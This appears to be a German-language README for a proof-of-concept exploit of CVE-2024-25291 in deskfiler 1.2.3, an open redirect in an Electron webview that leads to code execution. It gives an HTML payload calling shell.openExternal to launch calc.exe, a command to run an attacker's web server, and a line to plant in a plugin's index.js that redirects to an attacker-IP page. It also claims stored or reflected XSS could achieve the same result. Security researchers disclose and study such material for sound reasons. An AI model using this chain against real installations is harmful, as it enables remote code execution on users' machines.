
deskfiler 1.2.3 Open-Redirect-Exploit
Ein Proof-of-Concept für die Schwachstelle CVE-2024-25291.
deskfiler - 1.2.3 ermöglicht eine Electron-Webview in der Anwendung, mit daraus resultierendem Remote-Code
In diesem Repository befinden sich eine beispielhafte verwundbare Anwendung und ein Proof-of-Concept-Exploit (POC) dafür.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ Wenn du es schnell testen möchtest, erstelle mit dem folgenden Code einen Server auf dem PC des Angreifers.
$ python -m http.server 80
Hinweis: ※ Es wird angenommen, dass das Plug-in ein vom Angreifer erstelltes Plug-in ist und lediglich ein normales Plug-in darstellt, dem ein Code hinzugefügt wurde, um dem Server des Angreifers Zugriff zu ermöglichen. Für einfache Tests wurde BareBone ausgewählt.

Füge anschließend den folgenden Code zur Datei index.js im Pfad des BareBone-Ordners hinzu.
window.location='http://[attacker_ip]/hack.html'


In diesem PoC haben wir ein Plug-in verwendet; wir glauben jedoch, dass mit alternativen Angriffsvektoren eine Remote Code Execution (RCE) unabhängig möglich ist. Darüber hinaus wird RCE auch dann als durchführbar angesehen, wenn serverseitige Schwachstellen wie Stored XSS, Reflected XSS existieren.